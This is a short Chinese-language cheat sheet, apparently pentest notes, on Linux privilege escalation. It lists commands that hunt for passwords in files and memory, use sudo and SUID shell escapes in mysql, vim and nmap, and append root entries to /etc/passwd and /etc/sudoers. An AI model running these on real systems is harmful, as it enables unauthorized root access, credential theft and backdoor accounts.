内网的Linux提权基础

编程入门 行业动态 更新时间:2024-10-26 08:26:06

<a href=https://www.elefans.com/category/jswz/34/1768788.html style=内网的Linux提权基础"/>

内网的Linux提权基础

Linux 提权

目的 user -> root

提权手法

密码相关
  • 查看带有密码的文件

    grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null

  • 查看过期密码

    权限要求比较高

    cat /etc/security/opasswd

  • 用户最后编辑的文件

    find / -mmin -10 2>/dev/null | grep -Ev "^/proc"

  • 查看内存中密码

    同样要求高权限

    strings /dev/mem -n10 |grep -i pass

  • 查看敏感文件

    locate password | more

计划任务
  • 查看计划任务

    cat /var/log/cronlog

  • 编辑计划任务

    /etc/crontab

内核漏洞
  • 查看版本

  • exp

    Linux_Exploit_Suggester-master

  • 思路

    一般是找到一个c文件然后直接执行得到权限

sudo提权
  • sudo -l 查看当前权限

第一个 ALL 指示允许从任何终端、机器访问sudo

第二个 (ALL)指示sudo命令被允许以任何用户身份执行

第三个 ALL 表示所有命令都可以作为root执行

  • 如果只显示一个mysql的话,使用

    sudo mysql -e '\! /bin/sh'

    来获取一个shell

suid提权
  • 查看文件

    find / -user root -perm -4000 -print 2>/dev/null

  • 常见程序

    • nmap 2.02 ->5.21

      nmap > !sh

    • vim

      vim -c '!sh'

GTFOBins
利用可写文件
  • /etc/passwd

    echo 'user:0:0::/root:/bin/bash'>>/etc/passwd

  • /etc/sudoers

    echo 'user ALL=(ALL:ALL) ALL'>>/etc/sudoers

敏感组
  • docker

更多推荐

内网的Linux提权基础

本文发布于:2023-07-28 15:44:31,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1239311.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:内网   基础   Linux

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!